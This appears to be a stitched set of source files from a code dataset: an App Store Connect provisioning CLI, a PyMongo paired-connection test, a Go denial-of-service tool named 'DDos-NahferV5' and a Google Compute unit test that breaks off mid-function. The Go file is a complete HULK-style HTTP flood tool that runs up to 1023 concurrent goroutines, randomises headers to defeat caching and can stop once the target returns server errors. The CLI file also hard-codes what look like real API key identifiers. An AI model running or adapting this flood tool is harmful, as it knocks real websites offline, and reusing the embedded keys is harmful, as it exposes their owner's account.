'''delete bundleid with id '''
result = api.delete_bundle_id(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the bundleid id',required=True)
@click.pass_obj
def getbundleid(api,id):
'''get bundleid with id '''
result = api.get_bundle_id(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the bundleid id',required=True)
@click.pass_obj
def getbundleidprofiles(api,id):
'''get bundleid profiles with id '''
result = api.get_bundle_id_profiles(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-n','--name','name',metavar='',help='profile name',required=True)
@click.option('-b','--bundleid','bundleid',metavar='',help='profile contact bundleid id',required=True)
@click.option('-c','--certificate','certificateid',metavar='',help='certificate id associated with the profile',required=True)
@click.option('-o','--out','out_path',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='profile file out path , default user root path')
@click.option('-t','--type','type',type=click.Choice(['IOS_APP_DEVELOPMENT','IOS_APP_STORE','IOS_APP_ADHOC']),default='IOS_APP_ADHOC',metavar='',help='the profile type,choice:[IOS_APP_DEVELOPMENT, IOS_APP_STORE, IOS_APP_ADHOC] default IOS_APP_ADHOC')
@click.pass_obj
def createprofile(api,name,bundleid,certificateid,out_path,type):
'''create profile with name,bundleid,certificateid,out_path and type'''
result = api.create_profile(name=name,bundle_id=bundleid,certificate_id=certificateid,out_path=out_path,type=type)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the profile id',required=True)
@click.pass_obj
def deleteprofile(api,id):
'''delete profile with id '''
result = api.delete_profile(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-l','--limit','limit',default=100,metavar='', help='the profiles count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the profiles sort,default id')
@click.pass_obj
def profiles(api,limit,sort):
'''list profiles with limit and sort '''
result = api.list_profiles(limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-i','--id','id',metavar='', help='the profile id',required=True)
@click.pass_obj
def requestprofile(api,id):
'''request profile with id '''
result = api.request_profile(id)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-o','--out','outpath',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='file out path , default user root path')
@click.option('-l','--limit','limit',default=100,metavar='', help='the certificates count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the certificates sort,default id')
@click.pass_obj
def downloadcerts(api,outpath,limit,sort):
'''download certificate with limit and sort '''
result = api.download_certificates(outpath,limit,sort)
click.echo(json.dumps(result))
return result
@click.command()
@click.option('-o','--out','outpath',type=click.Path(exists=True),default=lambda: os.environ.get('HOME', ''),metavar='',help='file out path , default user root path')
@click.option('-l','--limit','limit',default=100,metavar='', help='the profiles count,default 100')
@click.option('-s','--sort','sort',default='id',metavar='',help='the profiles sort,default id')
@click.pass_obj
def downloadprofiles(api,outpath,limit,sort):
'''download profile with limit and sort '''
result = api.download_profiles(outpath,limit,sort)
click.echo(json.dumps(result))
return result
cli.add_command(registerdevice)
cli.add_command(devices)
cli.add_command(registercertificate)
cli.add_command(deletecertificate)
cli.add_command(certificates)
cli.add_command(downloadcerts)
cli.add_command(registerbundleid)
cli.add_command(bundleids)
cli.add_command(deletebundleid)
cli.add_command(getbundleid)
cli.add_command(getbundleidprofiles)
cli.add_command(createprofile)
cli.add_command(deleteprofile)
cli.add_command(profiles)
cli.add_command(requestprofile)
cli.add_command(downloadprofiles)
if __name__ == '__main__':
cli()
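# Leftover manual example calls; they never execute because cli() exits in click's
# standalone mode.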
api = ConnectApi('T5VR6D3TZY','5127e6a3-99ef-458f-9ea3-ba6b76e9cc13')
devices = api.list_devices(limit=1)
print(devices)
result = api.register_device('test','test')
print(result)
result = api.register_certificate(csr_path='/Users/last/Desktop/CertificateSigningRequest.certSigningRequest')
print(result)
result = api.delete_certificate('N9P79WJTHK')
print(result)
result = api.list_certificates()
print(result)
result = api.register_bundle_id(bundle_id='com.hepburn.app',team_id='6DD349HLLU',name='hepburn')
print(result)
result = api.list_bundle_ids()
print(result)
result = api.get_bundle_id('N49MX9AWAX')
print(result)
result = api.get_bundle_id_profiles('N49MX9AWAX')
print(result)
result = api.delete_bundle_id('N49MX9AWAX')
print(result)
result = api.create_profile(name='adhoc1',bundle_id='VSLGJ82UHW',certificate_id='T553J666XW',type='IOS_APP_DEVELOPMENT')
print(result)
result = api.delete_profile('4KVXW4LK52')
print(result)
result = api.list_profiles()
print(result)
result = api.request_profile('4KVXW4LK52')
print(result)
| [] | [] | ["HOME"] | [] | ["HOME"] | python | 1 | 0 | |
test/test_paired.py
|
# Copyright 2009-2010 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test pairing support.
These tests are skipped by nose by default (since they depend on having a
paired setup. To run the tests just run this file manually.
Left and right nodes will be $DB_IP:$DB_PORT and $DB_IP2:$DB_PORT2 or
localhost:27017 and localhost:27018 by default.
"""
import unittest
import logging
import os
import sys
import warnings
sys.path[0:0] = [""]
from pymongo.errors import ConnectionFailure
from pymongo.connection import Connection
skip_tests = True
class TestPaired(unittest.TestCase):
def setUp(self):
left_host = os.environ.get("DB_IP", "localhost")
left_port = int(os.environ.get("DB_PORT", 27017))
self.left = (left_host, left_port)
right_host = os.environ.get("DB_IP2", "localhost")
right_port = int(os.environ.get("DB_PORT2", 27018))
self.right = (right_host, right_port)
self.bad = ("somedomainthatdoesntexist.org", 12345)
def tearDown(self):
pass
def skip(self):
if skip_tests:
from nose.plugins.skip import SkipTest
raise SkipTest()
def test_types(self):
self.skip()
self.assertRaises(TypeError, Connection.paired, 5)
self.assertRaises(TypeError, Connection.paired, "localhost")
self.assertRaises(TypeError, Connection.paired, None)
self.assertRaises(TypeError, Connection.paired, 5, self.right)
self.assertRaises(TypeError, Connection.paired,
"localhost", self.right)
self.assertRaises(TypeError, Connection.paired, None, self.right)
self.assertRaises(TypeError, Connection.paired, self.left, 5)
self.assertRaises(TypeError, Connection.paired, self.left, "localhost")
self.assertRaises(TypeError, Connection.paired, self.left, "localhost")
def test_connect(self):
self.skip()
self.assertRaises(ConnectionFailure, Connection.paired,
self.bad, self.bad)
connection = Connection.paired(self.left, self.right)
self.assert_(connection)
host = connection.host
port = connection.port
connection = Connection.paired(self.right, self.left)
self.assert_(connection)
self.assertEqual(host, connection.host)
self.assertEqual(port, connection.port)
slave = self.left == (host, port) and self.right or self.left
self.assertRaises(ConnectionFailure, Connection.paired,
slave, self.bad)
self.assertRaises(ConnectionFailure, Connection.paired,
self.bad, slave)
def test_repr(self):
self.skip()
connection = Connection.paired(self.left, self.right)
self.assertEqual(repr(connection),
"Connection(['%s:%s', '%s:%s'])" %
(self.left[0],
self.left[1],
self.right[0],
self.right[1]))
def test_basic(self):
self.skip()
connection = Connection.paired(self.left, self.right)
db = connection.pymongo_test
db.drop_collection("test")
a = {"x": 1}
db.test.save(a)
self.assertEqual(a, db.test.find_one())
def test_end_request(self):
self.skip()
connection = Connection.paired(self.left, self.right)
db = connection.pymongo_test
for _ in range(100):
db.test.remove({})
db.test.insert({})
self.assert_(db.test.find_one())
connection.end_request()
def test_deprecation_warnings_paired_connections(self):
warnings.simplefilter("error")
try:
self.assertRaises(DeprecationWarning, Connection.paired,
self.left, self.right, timeout=3)
self.assertRaises(DeprecationWarning, Connection.paired,
self.left, self.right, auto_start_request=True)
self.assertRaises(DeprecationWarning, Connection.paired,
self.left, self.right, pool_size=20)
finally:
warnings.resetwarnings()
warnings.simplefilter('ignore')
def test_paired_connections_pass_individual_connargs(self):
c = Connection.paired(self.left, self.right, network_timeout=5)
self.assertEqual(5, c._Connection__net_timeout)
if __name__ == "__main__":
skip_tests = False
unittest.main()
| [] | [] | ["DB_PORT", "DB_PORT2", "DB_IP2", "DB_IP"] | [] | ["DB_PORT", "DB_PORT2", "DB_IP2", "DB_IP"] | python | 4 | 0 | |
DDos-NahferV5.go
|
package main
/*
HULK DoS tool on <strike>steroids</strike> goroutines. Just ported from Python with some improvements.
Original Python utility by Barry Shteiman http://www.sectorix.com/2012/05/17/hulk-web-server-dos-tool/
This go program licensed under GPLv3.
Copyright Alexander I.Grafov <[email protected]>
*/
import (
"flag"
"fmt"
"io/ioutil"
"math/rand"
"net/http"
"net/url"
"os"
"os/signal"
"strconv"
"strings"
"sync/atomic"
"syscall"
)
const __version__ = "1.0.1"
// const acceptCharset = "windows-1251,utf-8;q=0.7,*;q=0.7" // use it for runet
const acceptCharset = "ISO-8859-1,utf-8;q=0.7,*;q=0.7"
const (
callGotOk uint8 = iota
callExitOnErr
callExitOnTooManyFiles
targetComplete
)
// global params
var (
safe bool = false
headersReferers []string = []string{
"http://www.google.com/?q=",
"http://www.usatoday.com/search/results?q=",
"http://engadget.search.aol.com/search?q=",
//"http://www.google.ru/?hl=ru&q=",
//"http://yandex.ru/yandsearch?text=",
}
headersUseragents []string = []string{
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Vivaldi/1.3.501.6",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)",
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
"Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51",
}
cur int32
)
type arrayFlags []string
func (i *arrayFlags) String() string {
return "[" + strings.Join(*i, ",") + "]"
}
func (i *arrayFlags) Set(value string) error {
*i = append(*i, value)
return nil
}
func main() {
var (
version bool
site string
agents string
data string
headers arrayFlags
)
flag.BoolVar(&version, "version", false, "print version and exit")
flag.BoolVar(&safe, "safe", false, "Autoshut after dos.")
flag.StringVar(&site, "site", "http://localhost", "Destination site.")
flag.StringVar(&agents, "agents", "", "Get the list of user-agent lines from a file. By default the predefined list of useragents used.")
flag.StringVar(&data, "data", "", "Data to POST. If present hulk will use POST requests instead of GET")
flag.Var(&headers, "header", "Add headers to the request. Could be used multiple times")
flag.Parse()
t := os.Getenv("DDos-NahferV5")
maxproc, err := strconv.Atoi(t)
if err != nil {
maxproc = 1023
}
u, err := url.Parse(site)
if err != nil {
fmt.Println("err parsing url parameter\n")
os.Exit(1)
}
if version {
fmt.Println("DDos-NahferV5", __version__)
os.Exit(0)
}
if agents != "" {
if data, err := ioutil.ReadFile(agents); err == nil {
headersUseragents = []string{}
for _, a := range strings.Split(string(data), "\n") {
if strings.TrimSpace(a) == "" {
continue
}
headersUseragents = append(headersUseragents, a)
}
} else {
fmt.Printf("can'l load User-Agent list from %s\n", agents)
os.Exit(1)
}
}
go func() {
fmt.Println("->EMPEZANDO ATACAR <-\n Go!\n\n")
ss := make(chan uint8, 8)
var (
err, sent int32
)
fmt.Println("In use |\tResp OK |\tGot err")
for {
if atomic.LoadInt32(&cur) < int32(maxproc-1) {
go httpcall(site, u.Host, data, headers, ss)
}
if sent%10 == 0 {
fmt.Printf("\r%6d of max %-6d |\t%7d |\t%6d", cur, maxproc, sent, err)
}
switch <-ss {
case callExitOnErr:
atomic.AddInt32(&cur, -1)
err++
case callExitOnTooManyFiles:
atomic.AddInt32(&cur, -1)
maxproc--
case callGotOk:
sent++
case targetComplete:
sent++
fmt.Printf("\r%-6d of max %-6d |\t%7d |\t%6d", cur, maxproc, sent, err)
fmt.Println("\r->ATAQUE FINALIZADO<- \n\n\r")
os.Exit(0)
}
}
}()
ctlc := make(chan os.Signal)
signal.Notify(ctlc, syscall.SIGINT, syscall.SIGKILL, syscall.SIGTERM)
<-ctlc
fmt.Println("\r\n-- Interrupted by user -- \n")
}
func httpcall(url string, host string, data string, headers arrayFlags, s chan uint8) {
atomic.AddInt32(&cur, 1)
var param_joiner string
var client = new(http.Client)
if strings.ContainsRune(url, '?') {
param_joiner = "&"
} else {
param_joiner = "?"
}
for {
var q *http.Request
var err error
if data == "" {
q, err = http.NewRequest("GET", url+param_joiner+buildblock(rand.Intn(7)+3)+"="+buildblock(rand.Intn(7)+3), nil)
} else {
q, err = http.NewRequest("POST", url, strings.NewReader(data))
}
if err != nil {
s <- callExitOnErr
return
}
q.Header.Set("User-Agent", headersUseragents[rand.Intn(len(headersUseragents))])
q.Header.Set("Cache-Control", "no-cache")
q.Header.Set("Accept-Charset", acceptCharset)
q.Header.Set("Referer", headersReferers[rand.Intn(len(headersReferers))]+buildblock(rand.Intn(5)+5))
q.Header.Set("Keep-Alive", strconv.Itoa(rand.Intn(10)+100))
q.Header.Set("Connection", "keep-alive")
q.Header.Set("Host", host)
// Overwrite headers with parameters
for _, element := range headers {
words := strings.Split(element, ":")
q.Header.Set(strings.TrimSpace(words[0]), strings.TrimSpace(words[1]))
}
r, e := client.Do(q)
if e != nil {
fmt.Fprintln(os.Stderr, e.Error())
if strings.Contains(e.Error(), "socket: too many open files") {
s <- callExitOnTooManyFiles
return
}
s <- callExitOnErr
return
}
r.Body.Close()
s <- callGotOk
if safe {
if r.StatusCode >= 500 {
s <- targetComplete
}
}
}
}
func buildblock(size int) (s string) {
var a []rune
for i := 0; i < size; i++ {
a = append(a, rune(rand.Intn(25)+65))
}
return string(a)
}
| ["\"DDos-NahferV5\""] | [] | ["DDos-NahferV5"] | [] | ["DDos-NahferV5"] | go | 1 | 0 | |
tests/unit/gapic/compute_v1/test_reservations.py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import mock
import packaging.version
import grpc
from grpc.experimental import aio
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from requests import Response
from requests.sessions import Session
from google.api_core import client_options
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.api_core import grpc_helpers_async
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.cloud.compute_v1.services.reservations import ReservationsClient
from google.cloud.compute_v1.services.reservations import pagers
from google.cloud.compute_v1.services.reservations import transports
from google.cloud.compute_v1.services.reservations.transports.base import (
_GOOGLE_AUTH_VERSION,
)
from google.cloud.compute_v1.types import compute
from google.oauth2 import service_account
import google.auth
# TODO(busunkim): Once google-auth >= 1.25.0 is required transitively
# through google-api-core:
# - Delete the auth "less than" test cases
# - Delete these pytest markers (Make the "greater than or equal to" tests the default).
requires_google_auth_lt_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) >= packaging.version.parse("1.25.0"),
reason="This test requires google-auth < 1.25.0",
)
requires_google_auth_gte_1_25_0 = pytest.mark.skipif(
packaging.version.parse(_GOOGLE_AUTH_VERSION) < packaging.version.parse("1.25.0"),
reason="This test requires google-auth >= 1.25.0",
)
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return (
"foo.googleapis.com"
if ("localhost" in client.DEFAULT_ENDPOINT)
else client.DEFAULT_ENDPOINT
)
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert ReservationsClient._get_default_mtls_endpoint(None) is None
assert (
ReservationsClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
)
assert (
ReservationsClient._get_default_mtls_endpoint(api_mtls_endpoint)
== api_mtls_endpoint
)
assert (
ReservationsClient._get_default_mtls_endpoint(sandbox_endpoint)
== sandbox_mtls_endpoint
)
assert (
ReservationsClient._get_default_mtls_endpoint(sandbox_mtls_endpoint)
== sandbox_mtls_endpoint
)
assert ReservationsClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
@pytest.mark.parametrize("client_class", [ReservationsClient,])
def test_reservations_client_from_service_account_info(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_info"
) as factory:
factory.return_value = creds
info = {"valid": True}
client = client_class.from_service_account_info(info)
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
@pytest.mark.parametrize(
"transport_class,transport_name", [(transports.ReservationsRestTransport, "rest"),]
)
def test_reservations_client_service_account_always_use_jwt(
transport_class, transport_name
):
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=True)
use_jwt.assert_called_once_with(True)
with mock.patch.object(
service_account.Credentials, "with_always_use_jwt_access", create=True
) as use_jwt:
creds = service_account.Credentials(None, None, None)
transport = transport_class(credentials=creds, always_use_jwt_access=False)
use_jwt.assert_not_called()
@pytest.mark.parametrize("client_class", [ReservationsClient,])
def test_reservations_client_from_service_account_file(client_class):
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(
service_account.Credentials, "from_service_account_file"
) as factory:
factory.return_value = creds
client = client_class.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
client = client_class.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert isinstance(client, client_class)
assert client.transport._host == "compute.googleapis.com:443"
def test_reservations_client_get_transport_class():
transport = ReservationsClient.get_transport_class()
available_transports = [
transports.ReservationsRestTransport,
]
assert transport in available_transports
transport = ReservationsClient.get_transport_class("rest")
assert transport == transports.ReservationsRestTransport
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ReservationsClient, transports.ReservationsRestTransport, "rest"),],
)
@mock.patch.object(
ReservationsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReservationsClient)
)
def test_reservations_client_client_options(
client_class, transport_class, transport_name
):
# Check that if channel is provided we won't create a new one.
with mock.patch.object(ReservationsClient, "get_transport_class") as gtc:
transport = transport_class(credentials=ga_credentials.AnonymousCredentials())
client = client_class(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch.object(ReservationsClient, "get_transport_class") as gtc:
client = client_class(transport=transport_name)
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host="squid.clam.whelk",
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_MTLS_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = client_class()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}
):
with pytest.raises(ValueError):
client = client_class()
# Check the case quota_project_id is provided
options = client_options.ClientOptions(quota_project_id="octopus")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id="octopus",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name,use_client_cert_env",
[
(ReservationsClient, transports.ReservationsRestTransport, "rest", "true"),
(ReservationsClient, transports.ReservationsRestTransport, "rest", "false"),
],
)
@mock.patch.object(
ReservationsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(ReservationsClient)
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_reservations_client_mtls_env_auto(
client_class, transport_class, transport_name, use_client_cert_env
):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
options = client_options.ClientOptions(
client_cert_source=client_cert_source_callback
)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
if use_client_cert_env == "false":
expected_client_cert_source = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_client_cert_source = client_cert_source_callback
expected_host = client.DEFAULT_MTLS_ENDPOINT
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=True,
):
with mock.patch(
"google.auth.transport.mtls.default_client_cert_source",
return_value=client_cert_source_callback,
):
if use_client_cert_env == "false":
expected_host = client.DEFAULT_ENDPOINT
expected_client_cert_source = None
else:
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_client_cert_source = client_cert_source_callback
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=expected_host,
scopes=None,
client_cert_source_for_mtls=expected_client_cert_source,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(
os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
):
with mock.patch.object(transport_class, "__init__") as patched:
with mock.patch(
"google.auth.transport.mtls.has_default_client_cert_source",
return_value=False,
):
patched.return_value = None
client = client_class()
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ReservationsClient, transports.ReservationsRestTransport, "rest"),],
)
def test_reservations_client_client_options_scopes(
client_class, transport_class, transport_name
):
# Check the case scopes are provided.
options = client_options.ClientOptions(scopes=["1", "2"],)
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file=None,
host=client.DEFAULT_ENDPOINT,
scopes=["1", "2"],
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
@pytest.mark.parametrize(
"client_class,transport_class,transport_name",
[(ReservationsClient, transports.ReservationsRestTransport, "rest"),],
)
def test_reservations_client_client_options_credentials_file(
client_class, transport_class, transport_name
):
# Check the case credentials file is provided.
options = client_options.ClientOptions(credentials_file="credentials.json")
with mock.patch.object(transport_class, "__init__") as patched:
patched.return_value = None
client = client_class(client_options=options)
patched.assert_called_once_with(
credentials=None,
credentials_file="credentials.json",
host=client.DEFAULT_ENDPOINT,
scopes=None,
client_cert_source_for_mtls=None,
quota_project_id=None,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_aggregated_list_rest(
transport: str = "rest", request_type=compute.AggregatedListReservationsRequest
):
client = ReservationsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationAggregatedList(
id="id_value",
items={
"key_value": compute.ReservationsScopedList(
reservations=[compute.Reservation(commitment="commitment_value")]
)
},
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
unreachables=["unreachables_value"],
warning=compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED),
)
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationAggregatedList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.aggregated_list(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.AggregatedListPager)
assert response.id == "id_value"
assert response.items == {
"key_value": compute.ReservationsScopedList(
reservations=[compute.Reservation(commitment="commitment_value")]
)
}
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
assert response.unreachables == ["unreachables_value"]
assert response.warning == compute.Warning(code=compute.Warning.Code.CLEANUP_FAILED)
def test_aggregated_list_rest_from_dict():
test_aggregated_list_rest(request_type=dict)
def test_aggregated_list_rest_flattened():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ReservationAggregatedList()
# Wrap the value into a proper Response obj
json_return_value = compute.ReservationAggregatedList.to_json(return_value)
response_value = Response()
response_value.status_code = 200
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.aggregated_list(project="project_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, http_call, http_params = req.mock_calls[0]
body = http_params.get("data")
params = http_params.get("params")
assert "project_value" in http_call[1] + str(body) + str(params)
def test_aggregated_list_rest_flattened_error():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.aggregated_list(
compute.AggregatedListReservationsRequest(), project="project_value",
)
def test_aggregated_list_pager():
client = ReservationsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# Set the response as a series of pages
response = (
compute.ReservationAggregatedList(
items={
"a": compute.ReservationsScopedList(),
"b": compute.ReservationsScopedList(),
"c": compute.ReservationsScopedList(),
},
next_page_token="abc",
),
compute.ReservationAggregatedList(items={}, next_page_token="def",),
compute.ReservationAggregatedList(
items={"g": compute.ReservationsScopedList(),}, next_page_token="ghi",
),
compute.ReservationAggregatedList(
items={
"h": compute.ReservationsScopedList(),
"i": compute.ReservationsScopedList(),
},
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.ReservationAggregatedList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
